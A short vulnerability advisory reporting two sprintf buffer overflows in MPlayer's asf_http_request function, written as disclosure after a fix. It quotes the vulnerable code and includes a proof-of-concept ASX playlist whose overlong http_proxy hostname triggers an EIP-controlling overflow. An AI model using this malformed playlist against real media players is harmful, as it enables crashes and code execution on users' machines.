Mplayer Buffer Overflow
Favorite Linux Player Buffer Overflow
Product: Mplayer
Developers: http://www.mplayerhq.hu
OS: Port to All *NIX and Win32
Remote Exploitable: YES
Developers has been contacted, problem was fixed, recomended update your
mplayer version.
In the source tree there is a file called asf_streaming.c this file has a
function named asf_http_request, that function has two buffer overflows,
this overflows are in the sprintf lines.
asf_http_request {
char str[250];
....
...
..
sprintf( str, "Host: %s:%d", server_url->hostname,
server_url->port );
....
...
..
sprintf( str, "Host: %s:%d", url->hostname, url->port );
....
...
..
}
This, at a first look, may look as it can´t be exploited ( because the
MAXHOSTLEN size restriction )... but if in an ASX file like this with a
"badsite" listening in "badport" send "\n\n" as answer you could lead to a
fully controllable EIP buffer overflow
<asx version = "3.0">
<title>Bas Site ASX</title>
<moreinfo href = "mailto:info@xxxxxxxxxxx
<mailto:info@xxxxxxxxxxx> " />
<logo href = "http://www.badsite.com/streaming/grupo.gif
<http://www.badsite.com/streaming/grupo.gif> " style="ICON" />
<banner href= "images/bannermitre.gif">
<abstract>Bad Site live</abstract>
<moreinfo target="_blank" href = "http://www.badsite.com/
<http://www.badsite.com/> " />
</banner>
<entry>
<title>NEWS</title>
<AUTHOR>NEWS</AUTHOR>
<COPYRIGHT>© All by the news</COPYRIGHT>
<ref href =
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa"/>
<logo href = "http://www.badsite.com/streaming/grupo.gif
<http://badsite.com/streaming/grupo.gif> " style="ICON" />
</entry>
</asx>
Regards,
Hernán Otero
hernan.otero@xxxxxxx